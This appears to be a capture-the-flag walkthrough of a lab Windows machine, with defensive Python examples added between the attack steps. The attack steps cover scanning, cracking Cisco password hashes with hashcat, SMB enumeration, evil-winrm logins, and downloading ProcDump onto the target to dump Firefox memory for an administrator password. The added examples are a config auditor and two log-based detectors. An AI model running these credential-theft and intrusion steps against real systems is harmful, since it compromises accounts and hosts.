As usual, let's start with nmap:
nmap -sV -sC -p- 10.10.10.149
Open browser and go to 10.10.10.149
Click on Login as guest
Click on Attachment
Notice that the conversation was started by user Hazard
Looks like we may have found some credentials.
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
Let's do some password cracking. If we Google "password cracking type 7", we find a useful website called
Finally, we want to crack $1$pdQG$o8nrSzsGXeaduXrjlvKc91
To do that, let's use hashcat.
Go to the Downloads folder, for instance, create a new text file there called hashed.txt with nano, and paste your hash into it.
hashcat -m 500 hashed.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
Wait until it finishes the initialization:
When the initialization is done you should get the following:
Type s to get the status.
This might take a few minutes; the status output below gives an estimated time of 21 minutes. Just wait.
After a few minutes we get the password: stealth1agent
Hashcat assigns each algorithm a number, or "hash mode". MD5, for instance, was assigned hash mode 0.
-m 0 tells hashcat that we are going to crack MD5 hashes.
-m 500 is md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5), which matches the $1$ prefix of our hash.
There are many different modes; check out the full list here:
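The three credential lines found above illustrate the defender's side of this step: a Cisco IOS config leaking from a support ticket is only as safe as the weakest storage type in it, and types 7 (reversible) and 5 (md5crypt, hashcat mode 500) both fall quickly. The following Python config audit is an added example and not part of this writeup or of hashcat; it runs over a constructed config excerpt that embeds the three lines quoted above (the `username` prefixes, the `backup`/`ops` users and the type 9 hash are constructed filler) and reports which credentials need to be replaced with scrypt (type 9) secrets.

```python
import re

# Constructed Cisco IOS running-config excerpt. The three credential values are the
# ones quoted from the attachment above; the other lines are filler for the audit.
SAMPLE_CONFIG = """\
hostname rout3r
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
username backup password 0 changeme
username ops secret 9 $9$constructedsalt$constructedscrypthash
line vty 0 4
 login local
"""

# How each IOS credential type is stored and how much it is worth to someone who
# obtains the config. Type 5 is the md5crypt format cracked with hashcat -m 500
# above; type 7 is a reversible encoding, not a hash at all.
CREDENTIAL_TYPES = {
    "0": ("plaintext", "critical"),
    "7": ("reversible XOR obfuscation (what 'service password-encryption' produces)", "critical"),
    "4": ("unsalted SHA-256, deprecated type 4", "high"),
    "5": ("salted md5crypt ($1$), hashcat mode 500, fast to brute-force", "high"),
    "8": ("PBKDF2-SHA256 (type 8)", "ok"),
    "9": ("scrypt (type 9)", "ok"),
}

# keyword, optional single-digit type, then the stored value
CRED_RE = re.compile(r"\b(password|secret)\s+(?:(\d)\s+)?(\S+)")


def audit_config(config_text):
    """Return one finding per credential line: keyword, storage type, severity."""
    findings = []
    for line_no, line in enumerate(config_text.splitlines(), start=1):
        m = CRED_RE.search(line)
        if not m:
            continue
        keyword, cred_type, _value = m.groups()
        cred_type = cred_type or "0"  # no type digit means IOS stored it in clear
        storage, severity = CREDENTIAL_TYPES.get(cred_type, ("unknown type", "review"))
        findings.append({
            "line": line_no,
            "keyword": keyword,
            "type": cred_type,
            "storage": storage,
            "severity": severity,
            "text": line.strip(),
        })
    return findings


def weak_credentials(config_text):
    """Only the findings that need fixing (anything that is not type 8 or 9)."""
    return [f for f in audit_config(config_text) if f["severity"] != "ok"]


def remediation(finding):
    """IOS command that replaces the weak credential with a type 9 (scrypt) secret.
    <new-password> is a placeholder the operator fills in."""
    text = finding["text"]
    if text.startswith("enable "):
        return "enable algorithm-type scrypt secret <new-password>"
    user = text.split()[1] if text.startswith("username ") else "<user>"
    return f"username {user} algorithm-type scrypt secret <new-password>"


if __name__ == "__main__":
    for f in weak_credentials(SAMPLE_CONFIG):
        print(f"line {f['line']}: [{f['severity']}] {f['storage']}")
        print(f"    fix: {remediation(f)}")
```

Running it lists the enable secret as high (crackable offline, exactly as the writeup does) and the two type 7 passwords and the plaintext one as critical; the constructed type 9 line passes. Note that `service password-encryption` only upgrades cleartext to type 7, so it never makes a leaked config safe.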
Now let's turn to SMB: port 445 is open, which is SMB.
smbclient -L 10.10.10.149
SMB authentication always requires a username. If you don't specify one, it will use your VM username by default. When prompted for a password, just press Enter.
Ok that didn't work, we were not able to get a list of the shares available.
Recap on credentials found so far:
smbclient -L 10.10.10.149 -U hazard
For the password, I tried all the passwords we found above, and stealth1agent worked!
I checked all the shares available, but access is denied:
smbclient \\\\10.10.10.149\\ADMIN$ -U hazard
smbclient \\\\10.10.10.149\\C$ -U hazard
smbclient \\\\10.10.10.149\\IPC$ -U hazard
Now we do have the credentials for one of the users.
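What just happened, seen from the server's event log, is a short run of failed network logons for hazard from one source followed by a success (a router password reused for a Windows account). That pattern is cheap to detect. The Python below is an added example, not part of this writeup; it correlates constructed Windows Security 4625/4624 records (standard fields: EventID, TimeCreated, TargetUserName, IpAddress, LogonType) and raises an alert when a type 3 logon succeeds after a burst of failures for the same account from the same address. The timestamps and the second source host are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security log records modelling the SMB attempts above: three wrong
# passwords for "hazard" from the attacking VM, then a success, plus unrelated
# noise from another host. Status 0xC000006D is the standard "bad user name or
# password" code on a 4625.
SAMPLE_EVENTS = [
    {"EventID": 4625, "TimeCreated": "2019-08-10T10:00:01", "TargetUserName": "hazard",
     "IpAddress": "10.10.14.3", "LogonType": 3, "Status": "0xC000006D"},
    {"EventID": 4625, "TimeCreated": "2019-08-10T10:00:04", "TargetUserName": "hazard",
     "IpAddress": "10.10.14.3", "LogonType": 3, "Status": "0xC000006D"},
    {"EventID": 4625, "TimeCreated": "2019-08-10T10:00:09", "TargetUserName": "Hazard",
     "IpAddress": "10.10.14.3", "LogonType": 3, "Status": "0xC000006D"},
    {"EventID": 4624, "TimeCreated": "2019-08-10T10:00:15", "TargetUserName": "hazard",
     "IpAddress": "10.10.14.3", "LogonType": 3},
    {"EventID": 4625, "TimeCreated": "2019-08-10T10:02:00", "TargetUserName": "svc_backup",
     "IpAddress": "10.10.14.77", "LogonType": 3, "Status": "0xC000006D"},
    {"EventID": 4624, "TimeCreated": "2019-08-10T10:05:00", "TargetUserName": "administrator",
     "IpAddress": "10.10.14.77", "LogonType": 3},
    {"EventID": 4624, "TimeCreated": "2019-08-10T10:06:00", "TargetUserName": "chase",
     "IpAddress": "127.0.0.1", "LogonType": 2},
]

FAILURE_THRESHOLD = 3          # failures that make the following success suspicious
WINDOW = timedelta(minutes=10)  # how far back failures still count


def detect_success_after_failures(events, threshold=FAILURE_THRESHOLD, window=WINDOW):
    """Flag a network (type 3) logon that succeeds after `threshold` or more
    failures for the same account from the same source within `window`.
    Account names are compared case-insensitively, as Windows does."""
    failures = defaultdict(list)  # (user, ip) -> timestamps of recent 4625s
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev.get("LogonType") != 3:
            continue  # interactive/local logons are out of scope here
        key = (ev["TargetUserName"].lower(), ev["IpAddress"])
        when = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4625:
            failures[key].append(when)
        elif ev["EventID"] == 4624:
            recent = [t for t in failures[key] if when - t <= window]
            if len(recent) >= threshold:
                alerts.append({
                    "user": key[0],
                    "source": key[1],
                    "failures": len(recent),
                    "first_failure": recent[0].isoformat(),
                    "success_at": ev["TimeCreated"],
                })
            failures[key].clear()  # a success ends the sequence either way
    return alerts


if __name__ == "__main__":
    for a in detect_success_after_failures(SAMPLE_EVENTS):
        print(f"{a['user']} from {a['source']}: success at {a['success_at']} "
              f"after {a['failures']} failures since {a['first_failure']}")
```

On the sample it raises exactly one alert, for hazard from 10.10.14.3. The single failure for svc_backup and the clean administrator logon stay quiet, which is the point of keying on account plus source and requiring a burst before the success.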
Let's use something called lookupsid.py from impacket. This might help us enumerate more users.
The one we need is:
This tells us that we need to use the following format:
python3 lookupsid.py username:password@targetIP
python3 lookupsid.py Hazard:email@example.com
There is another user called chase.
Let's use evil-winrm (WinRM stands for Windows Remote Management).
First we need to install it. Open a brand new terminal window and type the following commands.
Start with the dependencies:
sudo gem install winrm winrm-fs stringio
Now we need to install git:
sudo apt install git
Now clone the repository:
sudo git clone https://github.com/Hackplayers/evil-winrm.git
Now change into the cloned directory.
Now we can connect to the target using:
./evil-winrm.rb -i 10.10.10.149 -u chase
When prompted for the password, enter:
We are in!
Congratulations! You got the flag!
Note that there is also a todo.txt on the desktop.
Now let's look for the root flag.
Access is denied. So we need to escalate our privileges.
Let's see what processes are running:
ps stands for Process Status.
Perhaps Chase is using Firefox to log in to the Issues portal? We have control over the process, so we could potentially take a process dump and perhaps find some passwords in it.
Let's use ProcDump, which can dump process memory. From your VM, go to https://docs.microsoft.com/en-us/sysinternals/downloads/procdump and click on Download ProcDump.
Once downloaded to your VM, open a new command prompt and type:
We now have procdump64.exe in our Downloads folder
From this Downloads folder, we are going to start a small web server on our VM using:
sudo python3 -m http.server 8080
Make sure you stay in the Downloads folder.
We have now started a web server on our VM on port 8080.
Do not close this window! Otherwise your web server will be shut down.
Let's check that our web server is working by opening our web browser and type:
The IP of my VM is 10.10.14.3, yours will be different. If you don't know the IP of your VM, open a new command prompt and type ifconfig
OK, now that our web server is working, we are going to get the target machine to connect to http://10.10.14.3:8080 and retrieve procdump64.exe.
To do that, go back to the target machine. Make sure you are in C:\Users\Chase\Desktop using:
Now let's go get procdump64.exe from our web server
wget "http://10.10.14.3:8080/procdump64.exe" -outfile "procdump64.exe"
We successfully downloaded procdump64.exe to the target machine!
I am now going to pick one of the process IDs; here I am picking the first one below, with process ID 380. Your process ID will be different.
I want to create a process dump of process ID 380 (Firefox). To do that I am using the following command:
.\procdump64.exe -ma 380 firefox.dmp
The -ma flag dumps the entire memory of the Firefox process.
firefox.dmp will be the name of my dump file.
The first time you use this tool you need to accept the EULA by adding -accepteula:
.\procdump64.exe -ma 380 firefox.dmp -accepteula
Now that we have the dump, we need to download strings.exe
From your VM, go to https://docs.microsoft.com/en-us/sysinternals/downloads/strings
Click on Download Strings
Strings.zip has been downloaded to your VM
Type n and press Enter.
strings.exe is now in our Downloads folder, meaning that it is also still served by our web server:
Now we need to get strings.exe downloaded onto the target machine. To do this, go back to the target machine and type:
wget "http://10.10.14.3:8080/strings.exe" -outfile "strings.exe"
Great! strings.exe is now on the target machine.
We are going to use strings.exe to search in the dump file (firefox.dmp) for any strings that have the word "password" in it. The idea is to find the password for administrator in the Firefox dump.
To do that, type:
./strings.exe firefox.dmp | findstr /i password
This will take a while.
We find the following credentials in the dump:
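From the defender's side, the escalation above leaves two clear traces: an unprivileged tool opening Firefox's process with memory-read access, then a .dmp file landing on disk. Both are visible in Sysmon telemetry as ProcessAccess (Event ID 10, fields SourceImage, TargetImage, GrantedAccess) and FileCreate (Event ID 11, fields Image, TargetFilename). The Python below is an added example, not part of this writeup or of Sysmon; it runs a simple rule over constructed Sysmon records modelling this step, checking the PROCESS_VM_READ bit (0x10) of the access mask rather than matching the tool's name, so a renamed ProcDump is caught too. The target list, allowlist paths and timestamps are constructed, and the rule generalises beyond the writeup to other credential-holding processes such as lsass.exe.

```python
PROCESS_VM_READ = 0x0010  # access right any tool must hold to read another process's memory

# Processes whose memory routinely holds credentials or session tokens. The writeup
# dumps firefox.exe; the others generalise the same idea.
SENSITIVE_TARGETS = {"firefox.exe", "chrome.exe", "msedge.exe", "lsass.exe", "keepass.exe"}

# Constructed allowlist of images expected to read other processes' memory
# (endpoint protection, WMI). Tune to the environment.
ALLOWED_SOURCES = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
}

# Constructed Sysmon records: ProcDump reading Firefox and writing firefox.dmp as
# in the writeup, surrounded by benign process-access noise.
SAMPLE_EVENTS = [
    {"EventID": 10, "UtcTime": "2019-08-10 11:20:01", "SourceImage": r"C:\Users\Chase\Desktop\procdump64.exe",
     "TargetImage": r"C:\Program Files\Mozilla Firefox\firefox.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "UtcTime": "2019-08-10 11:20:02", "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Program Files\Mozilla Firefox\firefox.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "UtcTime": "2019-08-10 11:20:03", "SourceImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetImage": r"C:\Program Files\Mozilla Firefox\firefox.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "UtcTime": "2019-08-10 11:20:04", "SourceImage": r"C:\Windows\explorer.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "UtcTime": "2019-08-10 11:20:05", "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 11, "UtcTime": "2019-08-10 11:20:09", "Image": r"C:\Users\Chase\Desktop\procdump64.exe",
     "TargetFilename": r"C:\Users\Chase\Desktop\firefox.dmp"},
    {"EventID": 1, "UtcTime": "2019-08-10 11:20:10", "Image": r"C:\Windows\System32\cmd.exe"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_memory_read(granted_access):
    """True if the Sysmon access mask (hex string) includes PROCESS_VM_READ."""
    return bool(int(granted_access, 16) & PROCESS_VM_READ)


def detect_memory_dumps(events):
    """Alert on memory reads of sensitive processes by non-allowlisted images,
    and on .dmp files written by anything not on the allowlist."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 10:
            src, tgt = ev["SourceImage"], ev["TargetImage"]
            if basename(tgt) not in SENSITIVE_TARGETS:
                continue
            if basename(src) == basename(tgt):
                continue  # browser parent/child processes open each other routinely
            if src.lower() in ALLOWED_SOURCES or not is_memory_read(ev["GrantedAccess"]):
                continue
            alerts.append({"rule": "sensitive-process-memory-read", "time": ev["UtcTime"],
                           "source": src, "target": tgt, "access": ev["GrantedAccess"]})
        elif ev["EventID"] == 11:
            if ev["TargetFilename"].lower().endswith(".dmp") and ev["Image"].lower() not in ALLOWED_SOURCES:
                alerts.append({"rule": "dump-file-written", "time": ev["UtcTime"],
                               "source": ev["Image"], "target": ev["TargetFilename"], "access": None})
    return alerts


if __name__ == "__main__":
    for a in detect_memory_dumps(SAMPLE_EVENTS):
        print(f"[{a['rule']}] {a['time']} {a['source']} -> {a['target']}")
```

On the sample this yields two alerts, both attributed to procdump64.exe on Chase's desktop; the Defender scan, Firefox's own child-process access and Task Manager's query-only handle to lsass.exe are all filtered out by the allowlist, the same-image rule and the access-mask check respectively. The second lesson of this step is about the data, not the tooling: an administrator password typed into a browser on a standard user's workstation stays in that browser's memory, so separating admin sessions from everyday accounts removes what ProcDump found here.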
Now that we have the credentials for the administrator account, we can use evil-winrm again, but this time login as administrator. From your VM, open a new command prompt window and type:
./evil-winrm.rb -i 10.10.10.149 -u administrator
Enter the password:
We are in!
Congratulations! You got the root flag!